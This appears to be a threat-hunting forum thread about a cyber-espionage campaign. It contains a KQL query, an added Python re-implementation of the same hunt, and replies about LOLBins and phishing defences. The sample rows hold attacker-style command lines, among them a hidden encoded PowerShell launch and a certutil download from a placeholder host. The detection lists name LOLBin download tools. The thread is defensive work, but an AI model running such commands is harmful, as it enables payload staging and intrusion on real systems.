SHADOW-EARTH-053: Deep Dive on New Asian & NATO Espionage Campaign
Just caught the Trend Micro report on the new threat cluster SHADOW-EARTH-053. It looks like a significant escalation in cyber-espionage, specifically targeting government and defense sectors across South, East, and Southeast Asia, plus a notable NATO member state.
While the article is light on specific CVEs right now, the targeting of journalists and activists alongside government bodies suggests a classic "information harvesting" operation. We've seen similar TTPs from China-aligned actors before, utilizing custom malware and phishing lures relevant to regional geopolitical events.
Since detailed IoCs are still emerging, I've updated our hunting queries to look for the initial access vectors usually associated with these groups—specifically, suspicious child process executions from Office products and unusual network traffic patterns.
Here is a KQL query I’m running in Sentinel to catch potential macro-based droppers or spear-phishing attempts commonly used in these campaigns:
DeviceProcessEvents
| where Timestamp > ago(3d)
| where InitiatingProcessFileName in~ ('winword.exe', 'excel.exe', 'powerpnt.exe')
| where ProcessFileName in~ ('powershell.exe', 'cmd.exe', 'mshta.exe', 'wscript.exe')
| project Timestamp, DeviceName, InitiatingProcessCommandLine, ProcessCommandLine, FolderPath
| order by Timestamp desc
Given the breadth of targets across Asia and Europe, I'm curious if anyone else in the forum has observed similar spikes in phishing traffic or suspicious C2 callbacks in their logs recently? Are we seeing a shift back to macro-based delivery, or is it all web shells these days?
Good catch on the parent-child process hunting. We've been seeing a lot of 'living off the land' binaries (LOLBins) in similar sectors recently. You might want to add specific checks for certutil.exe and bitsadmin.exe downloading files in that KQL query. We've observed actors using those for staging payloads instead of straight PowerShell to evade EDR hooks.
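As an added example, not from the original post or the replies, here is the same hunt re-implemented in Python so it can be checked offline against constructed DeviceProcessEvents rows: it applies the Office parent-to-scripting-child rule from the query above plus the certutil/bitsadmin download check suggested in this reply, with the query's 3-day window, projection and ordering. The sample rows, SAMPLE_NOW, the function names and the choice to flag the two LOLBins on a URL in their command line are all assumptions.

```python
from datetime import datetime, timedelta, timezone

# in~ sets from the query (case-insensitive) plus the reply's LOLBin downloaders; URL match is an assumption.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_CHILDREN = {"powershell.exe", "cmd.exe", "mshta.exe", "wscript.exe"}
LOLBIN_DOWNLOADERS = {"certutil.exe", "bitsadmin.exe"}
PROJECTED = ("Timestamp", "DeviceName", "InitiatingProcessCommandLine", "ProcessCommandLine", "FolderPath")
SAMPLE_NOW = datetime(2024, 5, 3, tzinfo=timezone.utc)  # constructed "now" so ago(3d) is deterministic

# Constructed sample rows shaped like DeviceProcessEvents; not real telemetry.
SAMPLE_EVENTS = [
    {"Timestamp": "2024-05-02T09:14:00Z", "DeviceName": "WS-EDIT-07",
     "InitiatingProcessFileName": "WINWORD.EXE", "InitiatingProcessCommandLine": "WINWORD.EXE /n cable.docm",
     "ProcessFileName": "powershell.exe", "ProcessCommandLine": "powershell.exe -w hidden -enc <redacted>",
     "FolderPath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"},
    {"Timestamp": "2024-05-01T16:40:00Z", "DeviceName": "WS-EDIT-03",
     "InitiatingProcessFileName": "EXCEL.EXE", "InitiatingProcessCommandLine": "EXCEL.EXE invite.xlsm",
     "ProcessFileName": "certutil.exe",  # not in the original child list, so the query alone misses it
     "ProcessCommandLine": "certutil.exe -urlcache -f http://example.invalid/s.txt s.txt",
     "FolderPath": "C:\\Windows\\System32\\certutil.exe"},
    {"Timestamp": "2024-05-02T11:00:00Z", "DeviceName": "WS-EDIT-07",  # benign: parent is not Office
     "InitiatingProcessFileName": "explorer.exe", "InitiatingProcessCommandLine": "explorer.exe",
     "ProcessFileName": "cmd.exe", "ProcessCommandLine": "cmd.exe /c dir", "FolderPath": "C:\\Windows\\System32\\cmd.exe"},
    {"Timestamp": "2024-04-20T08:00:00Z", "DeviceName": "WS-EDIT-09",  # outside the 3-day window
     "InitiatingProcessFileName": "winword.exe", "InitiatingProcessCommandLine": "winword.exe old.doc",
     "ProcessFileName": "cmd.exe", "ProcessCommandLine": "cmd.exe /c whoami", "FolderPath": "C:\\Windows\\System32\\cmd.exe"},
]

def office_spawned_script(ev):
    # Original query: an Office parent spawning a scripting host.
    return (ev["InitiatingProcessFileName"].lower() in OFFICE_PARENTS
            and ev["ProcessFileName"].lower() in SCRIPT_CHILDREN)

def lolbin_download(ev):
    # Reply's addition: certutil/bitsadmin invoked with a URL on the command line.
    cmd = ev["ProcessCommandLine"].lower()
    return ev["ProcessFileName"].lower() in LOLBIN_DOWNLOADERS and ("http://" in cmd or "https://" in cmd)

def hunt(events, now, days=3):
    # Equivalent of: where Timestamp > ago(3d) | where <rules> | project ... | order by Timestamp desc
    hits = []
    for ev in events:
        ts = datetime.strptime(ev["Timestamp"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        if ts <= now - timedelta(days=days):
            continue
        rule = ("office_child_script" if office_spawned_script(ev)
                else "lolbin_download" if lolbin_download(ev) else None)
        if rule:
            hits.append({"rule": rule, **{k: ev[k] for k in PROJECTED}})
    return sorted(hits, key=lambda h: h["Timestamp"], reverse=True)
```

Running `hunt(SAMPLE_EVENTS, SAMPLE_NOW)` returns two hits: the Word-to-PowerShell row and the Excel-to-certutil row, which the original child-process list alone would not have surfaced.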
From the MSP side, we manage a few smaller news bureaus in the region, and the volume of spear-phishing has jumped noticeably this month. The lures are getting incredibly convincing—often disguised as 'official' diplomatic cables or press invites. We've started enforcing strict Macro signing and ATP Safe Links to cut down the blast radius.